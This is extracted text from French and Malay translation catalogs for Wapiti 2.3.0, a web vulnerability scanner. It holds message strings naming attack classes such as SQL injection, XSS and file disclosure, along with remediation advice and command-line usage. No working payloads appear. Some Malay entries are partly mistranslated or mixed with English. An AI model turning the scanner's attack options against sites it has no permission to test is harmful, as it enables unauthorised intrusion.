Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been saved in the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been 
saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Disfonctionnement dans la protection .htaccess : {0} Evil url: {0} en provanance de {0} * Intputs: * Méthode : {0} * Selects: * TextAreas: * URLs explorées * URLs à explorer Note(QUERY_STRING)+ attackGET {0}+ attackPOST {0} en provenance de {1}Injection SQL .NETUn rapport a été généré dans le fichier {0}Injection SQL sur système MS-AccessAnomalies rencontrées :Le processus d'attaque a été interrompu. 
Pour relancer l'attaque, lancez Wapiti avec les options "-i" ou "-k"Divulgation de fichiers sur un système BSDCopie de sauvegardeIl se peut que des copies de sauvegarde de scripts soient accessibles sur le serveur. L'administrateur web a du placer volontairement une sauvegarde dans l'idée de revenir à une précédente version ou involontairement en utilisant un éditeur configuré pour sauver automatiquement une copie après une certaine durée.Ces fichiers peuvent révéler des informations intéressantes comme du code source ou encore des identifiants (accès à la base de données).L'administrateur web doit supprimer manuellement les sauvegardes présentes sous la racine web et reconfigurer l'éditeur qu'il utilise pour désactiver les sauvegardes automatiques.Copie de sauvegarde {0} trouvée pour {1}Injection SQL en aveugleTout comme les failles d'injection SQL classiques, les injections SQL en aveugle permettent à un attaquant d'altérer les requêtes normalement exécutées sur la base de données. Ce type de vulnérabilité est plus difficile à détecter en raison de l'absence de messages d'erreur renvoyés par l'application web.Pour se protéger des injections SQL, les données fournies par les utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes SQL mais doivent faire l'objet de vérifications (filtres, échappements) approfondies.Faille d'injection SQL en aveugleInjection CRLFLe terme CRLF fait référence à Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). 
Dans le protocole HTTP, ces deux caractères à la suite permettent entre autres de passer à la ligne d'entête suivante.Un script qui insère directement dans ses entêtes des données fournies par l'utilisateur peut alors se voir injecter des lignes d'entêtes qui seront interprétées par le navigateur de la victime.Vérifiez que les couples nom / valeur retournés dans les entêtes HTTP ne contiennent pas la suite de caractères CRLF.Sélectionnez le formulaire que vous souhaitez utiliser :Exécution de commandeExécution de commandesCe type d'attaque consiste à faire exécuter des commandes sur le serveur. L'attaquant tente d'injecter les commandes dans les paramêtres de requêtes qui lui sont accessibles.Ce type de vulnérabilité résulte souvent d'un manque de vérifications sur les données soumises par le visiteur. Pour les opérations sur les accès fichiers il est préférable d'utiliser des appels systèmes spécialisés au lieu de tenter de faire exécuter des commandes shell.Connexion refusée !Cross Site ScriptingLe Cross-site scripting (XSS) est une catégorie de vulnérabilités web qui permet d'exécuter du code dans le navigateur des visiteurs du site. 
Leur exploitation peut par exemple permettre le détournement d'une session qui a été ouverte sur un site par un utilisateur valide.Afin de se protéger des attaques XSS, il faut s'assurer que les données retournées dans une page ne contiennent pas certains caractères interprétés par le navigateur.Certains caractères considérés dangereux peuvent être remplacés par leur code d'entité HTML.Injection SQL DB2Date du scan : {0} Téléchargement depuis le web...Entrez un numéro : Erreur de téléchargement de la base NiktoImpossible d'atteindre l'URL {0}Erreur : Le serveur n'a pas compris la requêteAvertissement d'une évaluationEvil request:Evil request: Exception reçue dans lswww.browse : {0}Divulgation de fichierCes techniques permet à l'attaquant d'accèder à des fichiers auxquels il n'est pas sensé accèder car en dehors de la racine du serveur web. En utilisant certaines séquences comme '../', il peut remonter dans l'arborescence pour ainsi lister des répertoires ou obtenir le contenu de fichiers.Ne laissez pas aux utilisateurs la possibilité de choisir une ou plusieurs parties du nom d'un fichier ou d'un répertoire. Générez vous même des noms aléatoire en cas de création ou utilisez des correspondances en cas de templates (un ID numérique correspondant à une chaine de caractères. Utilisez des jails chroot et des restrictions d'accès pour limiter le nombre de fichiers accessibles par le serveur.Divulgation de fichier présent dans le include_pathFichier {0} chargé, le scan continue :Fichier {0} chargé. Wapiti va s'en servir pour effectuer l'attaqueLe Fichier {0} n'a pas été trouvé, Wapiti va recommencer le scan du siteLe fichier {0} n'a pas été trouvé. 
Wapiti va scanner le site à nouveauLe premier argument doit être l'URL racine !Formulaire {0}FormulairesFormulairesCopie de sauvegarde trouvée !Un XSS permanent a été trouvé en envoyant les champs {1} depuis {0}Un XSS permanent a été trouvé dans {0} avec {1}Depuis: {0}Protection par htaccess trouvée : {0}Contournement de htaccessLes fichiers htaccess permettent de restreindre l'accès a des fichiers ou répertoires en fonction d'identifiants ou méthode HTTP utilisés. Si la configuration a été mal faite il peut être possible de contourner la restriction.La configuration du htaccess doit être minutieusement vérifiée pour ne pas laisser une porte d'entrée à un éventuel attaquant.Injection SQL InterbaseErreur interne au serveurErreur interne au serveur. Le serveur a fait face à une situation inattendue qui l'a empêché de traiter convenablement la requête. Cela peut être le signe de la présence d'une vulnérabilité.Les logs de votre serveur HTTP ou de l'application web concernée devraient vous renseigner sur la nature exacte du problème.Argument invalide pour l'option {0} : {1}Cet argument n'est pas un lien valide : {0}Protocole invalide : {0}Paramètre en cause : {0}Injection SQL JavaInjection LDAPDivulgation de fichiers sur un système LinuxInjection MSSQLAssurez-vous que l'URL est correcte.Injection MySQLAucun formulaire n'a été trouvé dans cette page !Aucun lien ni formulaire trouvé dans cette page !Ouvrez {0}/index.html dans un navigateur pour voir ce rapport.Injection SQL OracleInterprétation de code PHPVeuillez renseignr les champs pour le formulaire suivant : Eventuelle faille de type {0}Injection PostgreSQLFichier potentiellement dangereuxCertains scripts sont connus pour être potentiellement vulnérables et dangereux. 
Des listes de tels fichiers existent et sont fréquemment utilisées par des attaquants pour scanner des sites Internet à la recherche de ces vulnérabilitées.L'administrateur devrait vérifier régulièrement si des mises à jour sont disponibles pour les scripts et logiciels utilisés sur le serveur. Il est aussi conseillé de se tenir informé sur les nouvelles vulnérabilités trouvées en s'abonnant à des listes de sécurité ou en suivant des flux RSS spécialisés.Un problème est survenu avec la base de données nikto localeUne erreur HTTP 500 a été obtenue avec {0}RéférencesFaille d'inclusion distanteRapportRapport pour {0} Consommation anormale de ressourceIl a fallu un temps anormallement long au serveur pour traiter la reqêquete. Un attaquant pourrait exploiter ce type de faiblesse pour surcharger le serveur.Le script en cause utilise probablement certaines ressources système (CPU, mémoire, accès disque etc) de façon inneficace. Son améliorations devrait être étudiée.Injection SQLLes failles d'injection SQL permettent à un attaquant de modifier les requêtes qui sont normalement exécutées sur le système de base de données. Un attaquant peut alors parvenir à extraire où à modifier des informations en base. 
Cela peut aussi potentiellement permettre à l'attaquant d'augmenter ses privilèges sur le système.Pour se protéger des injections SQL, les données fournies par les utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes SQL mais doivent faire l'objet de vérifications (filtres, échappements) approfondies.Scan interrompu, les données ont été sauvegardées dans le fichier {0}/{1}.xmlPortée de ce scan : {0} Code source :Faille XSS permanentRésumé des vulnérabilités :Injection SQL SybaseLa requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le paramètre {0}La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans la query stringLa requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le chemin de la ressourceLe serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre {0}Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans la query stringLe serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le chemin de la ressourceLe scan a été sauvegardé dans le fichier {0}/{1}.xmlUn délais d'attente dépassé a eu lieu avec {0}Pour reprendre ce scan, vous pouvez lancer wapiti avec l'option "-i"Vers: {0}URLSURLsScripts d'uploadScripts d'upload trouvés :Wapiti-2.3.0 (wapiti.sourceforge.net)Avertissement assertAvertissement execAvertissement usort()Divulgation de fichiers sur un système WindowInjection XPathFaille XSSFaille XSS trouvée via l'injection dans le paramètre {0}Faille XSS trouvée via l'injection dans la query stringFaille XSS trouvée via l'injection dans le chemin de la ressourceVous pouvez l'utiliser pour lancer de futures attaques sans avoir à relancer le scan via le paramètre "-k"[!] Dépendances manquantes pour le module {0} :[!] 
Impossible de trouver le module {0}[*] Chargement des modules :[+] Lancement du module {0}PoC en commande cURL : "{0}"erreur: délais d'attente dépassé lors de l'attaque de {0}erreur : {0} lors de l'attaque de {1}Divulgation de fichier présent dans basedur vie highlight_file()Inclusion d'un fichier présent dans le include_pathInjection via preg_replaceurl = {0}Wapiti-2.3.0 - Un scanneur de vulnérabilités pour applications web Mode d'emploi : python wapiti.py http://server.com/base/url/ [options] Les options possibles sont les suivantes : -s --start Commencer le scan par l'url spécifiée. Cette option peut être appelée plusieurs fois. Wapiti va explorer ces liens afin de trouver de nouvelles URLs même si c'est liens sont hors du périmètre de scan. -x --exclude Pour exclure une url du scan (par exemple un script de déconnexion). Cette option peut être appelée plusieurs fois. L'usage de l'astérisque (*) est possible comme expression régulière basique. Exemple : -x http://server/base/?page=*&module=test ou -x http://server/base/admin/* pour exclure un répertoire -p --proxy Spécifier l'utilisation d'un proxy. Les types de proxies actuellement supportés sont HTTP et HTTPs. Cette option peut être appelée deux fois afin d'indiquer le proxy HTTP ainsi que celui pour le HTTPS. Exemple: -p http://proxy:port/ -c --cookie Importer des cookies à utiliser pour le scan. Le fichier conteneur de cookies doit être au format JSON. Les cookies peut être récupérés via l'utilisation des outils cookie.py et getcookie.py présents dans le dossier "net". -t --timeout Définir le temps d'attente (en secondes) d'une réponse du serveur pour une requête. -a --auth Spécifier des identifiants pour l'authentification HTTP --auth-method Si le serveur réclame une authentification, permet de spéficier la méthode d'authentification à utiliser. 
Les méthodes actuellement supportées sont (certaines nécessitent l'installation de module supplémentaires) : + basic + digest + kerberos + ntlm -r --remove Retirer un paramêtre (nom et valeur) de toutes les URLs. -n --nice Définir une limite pour le nombre d'URLs à traiter qui sont basées sur la même construction (càd, le nombre maximum de valeurs uniques pour un même paramètre). Utilisez cette option pour éviter d'entrer dans des boucles infinies lors du scan. Cette valeur doit être supérieur à 0. -m --module Définir les modules et les méthodes HTTP associées à utiliser pour les attaques. Précédez le nom d'un module par un tiret pour le désactiver. Pour explorer la cible sans lancer la moindre attaque, désactivez tous les modules avec -m "-all". En l'absence de méthodes HTTP spécifiées pour un module, GET et POST seront utilisés. Exemple: -m "-all,xss:get,exec:post" -u --color Utiliser les couleurs du terminal pour mettre en valeur les vulnérabilités et anomalies. -v --verbose Définie le niveau de verbosité des résultats. 0: silencieux (défaut), 1: affiche chaque url, 2: affiche chaque attaque. -b --scope Définir le périmètre du scan : + page : analyser uniquement la page donnée en argument principal. + folder : analyser toutes les pages trouvées sous l'arborescence passée comme URL (par défaut). + domain : analyser toutes les pages trouvées pour le domaine correspondant à celui spécifié dans l'URL passée à Wapiti. -f --format Définir le format du rapport. json: Rapport au format JSON html: Rapport au format HTML (choix par défaut) openvas: Rapport au format XML OpenVAS txt: Rapport au format texte simple (UTF-8) vulneranet: Rapport au format XML VulneraNET xml: Rapport au format XML -o --output Spéficier l'emplacement du disque où enregistrer le rapport. Si le rapport est au format html, ce paramètre sera utilisé comme nom de répertoire. -i --continue Reprendre une session de scan en chargeant le status sauvegardé dans le fichier XML spécifié. 
Si le paramètre est appelé sans argument, Wapiti charge la session depuis un fichier par défaut présent dans le dossier "scans". -k --attack Lancer directement les attaques en chargeant les URLs présentes dans le fichier XML de status spécifié (sans relancer l'exploration des pages du site). Si le fichier n'est pas spécifié, Wapiti charge un fichier par défaut présent dans le dossier "scans". --verify-ssl <0|1> Indique à Wapiti s'il doit ou non vérifier les certificats SSL. Le comportement par défaut est de vérifieir les certificats. -h --help Afficher ce message d'aide {0} : {1:>3} {0} HtAccess{0} dans {1} via une injection dans le paramètre {2}{0} dans {1} via une injection dans la query string{0} dans {1} via une injection dans le chemin de la ressource{0} via une injection dans le paramètre {1}{0} via une injection dans la query string| Code HTTP : {0}| Code HTTP : {0} : {1}
wapiti-2.3.0+dfsg/wapitiCore/config/language/ms/LC_MESSAGES/wapiti.mo
.htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found. 
Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been 
saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Kelemahan pemintasan .htaccess : {0} Pautan berbahaya: {0} melalui {0} * Inputs: * Kaedah: {0} * Pilih: * Kawasan teks: * URLs dilayari * URLs untuk dilayar Notice(RENTETAN_QUERY)+ attackGET {0}+ attackPOST {0} dari {1}Suntikan .NET SQLLaporan telah dijana dalam fail {0}Akses berasaskan Suntikan SQLSuntikan SQL berasaskan AksesKeganjilan (anomalies) ditemui:Proses serangan terganggu. 
Untuk mengulangi serangan, lancarkan Wapiti dengan "-i" or "-k" parameter.Kelemahan pendedahan fail BSD setempatFail SadaranKemungkinan untuk menemui fail sandaran pada skrip di pelayan web dimana pentadbir web meletakkan disini untuk menyimpan versi sebelum atau fail sandaran yang dijana secara automasi oleh perisian penyuntingan (seperti Emacs). Salinan ini boleh mendedahkan maklumat yang menarik seperti kod program atau kelayakkanPentadbir web mesti secara manual menghapuskan fail sandaran atau mengalihnya keluar dari laman web asas (root). Pentadbir web perlu menyusun semula penyunting untuk menyahaktifkan sandaran automatikFail sandaran {0} ditemui untuk {1}Suntikan buta SQL Suntikan SQL buta merupakan teknik yang mengeksploitasi kelemahan yang berlaku in the database of an application. This kind of vulnerability is harder to dalam pangkalan data aplikasi. Kelemahan jenis ini lebih sukar untuk mengesan daripada suntikan SQL asas kerana mesej ralat akan dipaparkan pada laman web.Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak terus dimasukkan ke dalam penyata SQL. Sebaliknya, input pengguna mesti di 'escaped' atau ditapis atau penyata diparameter mesti digunakanKelemahan SQL buta Suntikan CRLFIstilah CRLF merujuk kepada Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). Ia digunakan untuk memaklumkan penamatan talian, Walau bagaimanapun, diuruskan berbeza dalam sistem operasi popular hari ini. Sebagai contoh: dalam Windows kedua-dua CR dan LF perlu ambil perhatian akhir garisan, manakala dalam Linux/UNIX LF yang hanya diperlukan. Kombinasi ini CR dan LR digunakan untuk contoh apabila menekan 'Enter' pada papan kekunci. 
Bergantung pada aplikasi digunakan, menekan 'Enter' pada amnya mengarahkan aplikasi untuk memulakan sebuah baris baru, atau untuk menghantar perintah.Semak parameter dihantar dan tidak membenarkan CRLF yang akan disuntik oleh penapisan CRLFPilih borang yang anda hendak guna:Perintah arahanPerintah arahanSerangan ini terdiri dalam melaksanakan arahan sistem pada pelayan Penyerang cuba menyuntik perintah ini dalam parameter permintaanLebih cenderung berfungsi tanpa pengguna input bila menggunakan fail sistem panggilanSambungan ditolak!Penyuntikan Skrip Ke Laman Web(Cross Site Scripting)Serangan injeksi code pada laman (XSS) adalah jenis kelemahan keselamatan komputer biasanya didapati dalam aplikasi web yang membolehkan suntikan kod oleh pengguna web yang berniat jahat ke dalam laman web yang dilihat oleh pengguna web lain. Contoh-contoh Kod termasuk skrip kod HTML dan skrip klien.Cara terbaik untuk melindungi aplikasi web yang daripada serangan XSS adalah memastikan bahawa aplikasi melaksanakan pengesahan semua pengepala, cookies, rentetan pertanyaan, medan borang, dan medan-medan yang tersembunyi. Pengguna pengekodan dibekalkan output dalam pelayan boleh juga mengalahkan kelemahan XSS dengan menghalang skrip yang dimasukkan dari dihantar kepada pengguna dalam bentuk yang boleh dilaksanakan. 
Aplikasi boleh mendapat perlindungan ketara daripada javascript berdasarkan serangan dengan menukar aksara berikut di semua output yang dihasilkan dengan entiti HTML yang sesuai pengekodan: <, >, &, ", ', (, ), #, %, ; , +, -.Suntikan DB2Tarikh imbasan : {0} Memua turun dari web...Masukkan nombor : Ralat memuat turun pangkalan data NiktoRalat mendapatkan url {0}Ralat: Pelayan tidak memahami permintaan tersebutAmaran penilaianPermintaan berbahaya:Permintaan berbahaya: Pengecualian pada lswww.browse: {0}Pengendalian FailSerangan ini adalah juga dikenali sebagai laluan Transversal atau Transversal direktori, dimana matlamatnya adalah akses kepada fail-fail dan direktori yang disimpan di luar web asas direktori. Penyerang cuba meneroka direktori yang disimpan dalam web pelayan. Penyerang menggunakan beberapa teknik, sebagai contoh, memanipulasi pembolehubah rujukan fail dengan ' dot-dot-slash (.../)' urutan dan variasi untuk bergerak ke direktori asas untuk mengemudi sistem fail iniLebih cenderung berfungsi tanpa input dari pengguna bila menggunakan fail sistem panggilan.Mengguna indeks daripada bahagian sebenar fail nama apabila membuat 'templating' atau menggunakan fail bahasa (cth: nilai 5 dari pilihan pengguna = Czechoslovakian, bukannya mengharapkan pengguna untuk kembali 'Czechoslovakian'). Memastikan pengguna tidak boleh membekalkan semua bahagian laluan - mengelilingi ia dengan kod laluan anda. Mengesahkan input pengguna dengan hanya menerima yang diketahui baik - jangan membetulkan data. Gunakan 'chrooted jails' dan kod akses polisi untuk menyekat di manafail boleh diperolehi atau disimpan.Kelemahan pendedahan fail pada include_pathFail {0} dimuatkan, imbasan terus:Fail {0} dimuatkan. Wapiti akan menggunakannya untuk melakukan seranganFail {0} tidak ditemui, Wapiti akan mengimbas semula laman webFail {0} tidak ditemui. 
Wapiti akan imbas semula laman webArgumen pertama mestilah url asas (root url) !Borang {0}BorangMaklumat BorangTemui fail sandaran !Menemui serangan XSS tetap oleh{0} dengan medan {1}Menemui XSS tetap pada {0} dengan {1}Dari: {0}Perlindungan HtAccess ditemui: {0}Pemintasan HtaccessFail htaccess digunakan untuk menyekat akses ke beberapa fail atau kaedah HTTP. Dalam sesetengah kes mungkin untuk memintas sekatan ini dan mengakses fail.Pastikan setiap kaedah HTTP adalah dilarang jika kelayakan yang buruk.Suntikan InterbaseRalat Pelayan DalamanRalat telah berlaku pada bahagian pelayan, dimana mencegah proses permintaan. Ia mungkin tanda kelemahanMaklumat lanjut mengenai ralat perlu dicari dalam log pelayan.Argumen tidah sah untuk pilihan {0} : {1}Pautan argumen tidak sah: {0}Protokol tidak sah: {0}Parameter terlibat: {0}Suntikan Java.SQLSuntikan LDAPKelemahan pendedahan fail Linux setempatSuntikan berasaskan MSSQLPastikan url adalah betul.Suntikan MySQLTiada borang ditemui pada muka laman ini !Tiada pautan atau borang ditemui dalam muka laman ini !Buka {0}/index.html dengan pelayar web untuk melihat laporan ini.Suntikan OraclePenilaian PHPSila masukkan nilai untuk borang berikut: Kemungkinan {0} kelemahanSuntikan PostgreSQLFail berpontensi bahayaFail yang berpotensi mempunyai kelemahan telah ditemui di laman web.Pastikan skrip dikemaskini dan menghadkan capaian sekiranya boleh.Gangguan dengan pangkalan data setempat niktoTerima ralat HTTP 500 dalam {0}Rujukan:Kemasukan kelemahan jauh (remote)LaporanLaporan untuk {0} Penggunaan sumberIa mengambil masa yang tidak normal ke pelayan untuk membalas pertanyaan. Penyerang mungkin memanfaatkan kelemahan untuk memuat (overload) pelayan jenis ini.Skrip terlibat mungkin menggunakan sumber pelayan (CPU, memori, rangkaian, capaian fail...) dengan cara yang tidak efisyen.Suntikan SQLsuntikan kelemahan SQL ini membolehkan penyerang untuk mengubah pertanyaan yang dilaksanakan pada bahagian belakang pangkalan data. 
Penyerang kemudian mungkin dapat ekstrak atau mengubah suai maklumat yang disimpan dalam pangkalan data atau meningkatkatkan keistimewaan (privileges) pada sistem.Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak secara langsung dimasukkan ke dalam penyata SQL. Sebaliknya, input pengguna mesti 'escaped' atau ditapis atau penyata diparameter mesti digunakanImbasan berhenti, data telah disimpan dalam fail {0} / {1}.xmlSkop imbasan : {0} Kod program:Kelemahan XSS simpanan (stored)Rumusan kelemahan :Suntikan SybasePermintaan tamat masa ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada rentetan perintah (query string)Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada sumber laluan(resource path)Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}Pelayan membalas kod ralat HTTP 500 ketika mencuba menyuntik muatan (payload) pada rentetan perintah (query string)Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada laluan sumber(resource path)Imbasan ini telah disimpan dalam fail {0}/{1}.xmlTamat masa dalam {0}Untuk meneruskan imbasan ini, anda harus melancarkan Wapiti dengan "-i" parameterKe: {0}URLSURLsMemuat naik skripMemuat naik skrip (Upload scripts) ditemui:Wapiti-2.3.0 (wapiti.sourceforge.net)Amaran menegaskanAmaran execAmaran usort()Kelemahan pendedahan fail Windows setempatSuntikan XPathKelemahan XSSKelemahan XSS ditemui melalui suntikan pada parameter {0}Kelemahan XSS ditemui melalui suntikan pada rentetan perintah (query string)Kelemahan XSS ditemui melalui suntikan pada sumber laluan (resource path)Anda boleh menggunakannya untuk melakukan serangan tanpa imbasan semula laman web dengan "-k" parameter[!] Hilang kebergantungan untuk modul {0}:[!] 
Tidak dapat menemui modul yang dinama {0}[*] Memuatkan modul:[+] Pelancaran modul {0}Perintah cURL PoC : "{0}"ralat: tamat masa ketika serangan {0}ralat: {0} ketika serangan {1}Kelemahan highlight_file() pada basedirinclude() termasuk dalam include_pathSuntikan preg_replaceurl = {0}Wapiti-2.3.0 - Pengimbas kerentanan aplikasi web dan sekuriti auditor Usage: python wapiti.py http://server.com/base/url/ [options] Pilihan arahan yang disokong oleh aplikasi: -s --start Untuk menentukan url bermula dengan. Pilihan ini boleh diguna pakai beberapa kali. Wapiti akan lihat pautan ini untuk mencari lebih banyak URL walaupun pautan tertentu tidak berada di dalam skop. -x --exclude Untuk mengecualikan URL dari imbasan (contoh: URL log keluar). Pilihan ini boleh diguna pakai beberapa kali untuk menentukan beberapa URL. Kad liar (*) boleh digunakan di URL untuk regex asas. Contoh : -x http://server/base/?page=*&module=test atau -x http://server/base/admin/* untuk mengecualikan satu direktori. -p --proxyi Untuk menentukan proksi. Proksi-proksi yang disokong pada masa ini adalah HTTP dan HTTPS. Pilihan ini boleh digunakan dua kali untuk tentukan proksi HTTP dan HTTPS. Contoh: -p http://proksi:port/ -c --cookie Untuk mengimport cookie menggunakan imbasan. Fail cookie tersebut mesti dalam format JSON. Cookies boleh diperolehi menggunakan utiliti cookie.py dan getcookie.py (direktori net). -t --timeout Untuk menetapkan had tamat masa(maksimum masa dalam saat menunggu pelayan untuk menghantar maklum balas). -a --auth Kelayakan yang ditetapkan bagi pengesahan HTTP. --auth-method Jika pelayan memerlukan pengesahan, tetapkan kaedah pengesahan untuk digunakan. Kaedah yang disokong pada masa ini (sesetengah memerlukan modul tambahan untuk dimuat turun) adalah: + basic + digest + kerberos + ntlm -r --remove Mengeluarkan satu parameter (nama dan nilai) dari URL. 
